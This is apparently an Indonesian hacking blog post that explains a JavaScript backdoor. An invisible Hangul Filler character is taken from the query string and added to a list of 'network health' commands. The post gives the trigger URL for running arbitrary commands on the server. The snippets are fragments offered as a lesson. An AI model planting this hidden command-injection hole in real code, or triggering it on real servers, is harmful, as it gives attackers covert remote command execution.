JS backdoor (Security Issues)

0 min read


Okay guys ya.. balik lagi dengan saya.. karena sudah lama banget gak bahas hacking, jadi kita akan tambah article tentang hacking ya supaya categories hacking blog ini ada isinya, dan disclaimer lagi kalau ini hanya untuk pembelajaran saja, oke tanpa basa-basi kita gas aja …

Example Script

The character “ㅤ” (0x3164 in hex) is called “HANGUL FILLER”

 const { timeout,\u3164} = req.query;

 destructuring assignment untuk deconstruct HTTP parameternya dari req.query

 const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',\u3164
    ];

Final:

http://host:8080/network_health?%E3%85%A4=<your command>

Okay cukup sekian dulu dari saya ya, cyaaa..

Bima Sena

Leave a Reply

Your email address will not be published. Required fields are marked *